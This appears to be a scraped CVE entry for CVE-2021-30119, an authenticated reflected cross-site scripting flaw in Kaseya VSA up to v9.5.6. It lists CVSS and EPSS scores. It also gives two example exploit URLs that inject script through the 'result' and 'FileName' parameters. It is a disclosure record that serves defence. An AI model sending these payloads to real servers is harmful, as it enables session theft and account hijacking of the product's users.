Lucene search

K
cvelistMitreCVELIST:CVE-2021-30119
HistoryJul 09, 2021 - 1:20 p.m.

CVE-2021-30119 Authenticated Authenticated reflective XSS in Kaseya VSA <= v9.5.6

2021-07-0913:20:58
mitre
www.cve.org
8
cve-2021-30119
authenticated
reflective xss
kaseya vsa
v9.5.6

CVSS3

5.4

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

AI Score

6.4

Confidence

High

EPSS

0.001

Percentile

26.4%

Authenticated reflective XSS in HelpDeskTab/rcResults.asp The parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack Example request: https://x.x.x.x/HelpDeskTab/rcResults.asp?result=&lt;script&gt;alert(document.cookie)&lt;/script&gt; The same is true for the parameter FileName of /done.asp Eaxmple request: https://x.x.x.x/done.asp?FileName=";&lt;/script&gt;&lt;script&gt;alert(1);a="&PathData=&originalName=shell.aspx&FileSize=4388&TimeElapsed=00:00:00.078

CVSS3

5.4

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

AI Score

6.4

Confidence

High

EPSS

0.001

Percentile

26.4%